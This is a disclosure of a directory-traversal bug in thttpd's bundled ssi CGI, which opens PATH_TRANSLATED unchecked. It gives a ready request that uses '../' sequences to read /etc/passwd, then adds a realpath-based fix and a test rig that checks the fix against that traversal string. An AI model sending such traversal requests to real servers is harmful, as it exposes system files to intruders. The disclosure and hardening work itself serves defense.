ssi (server side includes) is a CGI proggie that comes by default with the thttpd web server; I am not sure about others. ssi has a nasty bug with regard to the PATH_TRANSLATED env var.

    path_translated = getenv( "PATH_TRANSLATED" );
    if ( path_translated == (char*) 0 )
        {
        internal_error( "Couldn't get PATH_TRANSLATED environment variable." );
        exit( 1 );
        }

    /* Open it. */
    fp = fopen( path_translated, "r" );
    read_file( path_info, path_translated, fp );

As you can see, the contents of PATH_TRANSLATED get copied into path_translated, which gets fopen()'ed later. It does no checking on the path_translated string. After it opens the file it runs the read_file() function, which returns the contents of fp. So, as you can plainly see, we can view any file on the system. Try

    GET /cgi-bin/ssi//../../../../../../../../../etc/passwd

This would yield the passwd file.
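A hardened form of that open, as an added example (not thttpd's code and not its actual fix): canonicalize the path with realpath() and refuse anything that resolves outside the document root. The names open_translated and demo_check are hypothetical, and the sketch assumes the CGI knows its document root.

```c
#define _XOPEN_SOURCE 700   /* realpath(), mkdtemp() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: open path_translated only if its canonical form
   (".." and symlinks resolved) lies under docroot; NULL otherwise. */
FILE *open_translated(const char *docroot, const char *path_translated)
{
    char root[PATH_MAX], real[PATH_MAX];
    size_t n;
    if (docroot == NULL || path_translated == NULL) return NULL;
    if (realpath(docroot, root) == NULL) return NULL;
    if (realpath(path_translated, real) == NULL) return NULL;
    n = strlen(root);
    /* Prefix must end on a path boundary so /srv/www does not match /srv/www2. */
    if (strncmp(real, root, n) != 0 || real[n] != '/') return NULL;
    return fopen(real, "r");   /* open the checked path, not the raw input */
}

/* Constructed test rig: temporary docroot holding one file. Returns 1 if
   docroot+suffix is served, 0 if refused, -1 on setup failure. */
int demo_check(const char *suffix)
{
    char root[] = "/tmp/ssi_demo_XXXXXX";
    char page[PATH_MAX], req[PATH_MAX];
    FILE *fp;
    int served;
    if (mkdtemp(root) == NULL) return -1;
    snprintf(page, sizeof page, "%s/index.html", root);
    if ((fp = fopen(page, "w")) == NULL) return -1;
    fputs("hello\n", fp);
    fclose(fp);
    snprintf(req, sizeof req, "%s%s", root, suffix);
    fp = open_translated(root, req);
    served = (fp != NULL);
    if (fp != NULL) fclose(fp);
    remove(page);
    remove(root);
    return served;
}

int main(void)
{
    printf("index.html: %d\n", demo_check("/index.html"));
    printf("traversal:  %d\n", demo_check("/../../../../../../../../etc/passwd"));
    return 0;
}
```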
